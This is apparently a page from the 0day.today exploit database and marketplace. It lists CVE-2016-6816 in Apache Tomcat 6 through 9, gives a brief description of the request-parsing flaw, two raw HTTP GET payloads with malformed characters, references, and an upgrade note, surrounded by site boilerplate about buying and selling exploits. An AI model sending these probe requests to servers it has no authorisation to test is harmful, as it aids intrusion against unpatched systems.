0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Apache Tomcat 6/7/8/9 - Information Disclosure Vulnerability

Author

justpentest

Risk

[

Security Risk High

]

0day-ID

Category

Date add

CVE

Platform

# Exploit Title:Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
# Date: 4th March 2017
# Exploit Author: justpentest
# Vendor Homepage: tomcat.apache.org
# Version: Apache Tomcat 9.0.0.M1 through 9.0.0.M11, 8.5.0 through 8.5.6,
8.0.0.RC1 through 8.0.38, 7.0.0 through 7.0.72 and 6.0.0 through 6.0.47
 
 
Source: http://www.securityfocus.com/bid/94461/info
 
1) Description:
Apache Tomcat is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions
and perform unauthorized actions. This may lead to further attacks.
Apache Tomcat 9.0.0.M1 through 9.0.0.M11, 8.5.0 through 8.5.6, 8.0.0.RC1
through 8.0.38, 7.0.0 through 7.0.72 and 6.0.0 through 6.0.47 are
vulnerable.
This could be exploited, in conjunction with a proxy that also permitted
the invalid characters but with a different interpretation, to inject data
into the HTTP response. By manipulating the HTTP response the attacker
could poison a web-cache, perform an XSS attack and/or obtain sensitive
information from requests other then their own.
 
http://www.securityfocus.com/bid/94461/discuss
2) Exploit:
 
GET /?{{%25}}cake\=1 HTTP/1.1
Host: justpentest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Cookie:
NSC_MSN-IBNQ-VX-mcwtfswfs=ffffffff091c1daaaa525d5f4f58455e445a4a488888
 
 OR
 
GET
/?a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c=1
HTTP/1.1
 
Response will be Apache tomcat front page something like
https://en.wikipedia.org/wiki/File:Apache-tomcat-frontpage-epiphany-browser.jpg
 
3) Refrences:
https://nvd.nist.gov/vuln/detail/CVE-2016-6816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6816
 
4) Solution:
As usual update ;)

#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Apache Tomcat 6/7/8/9 - Information Disclosure Vulnerability

Report Error

Report Error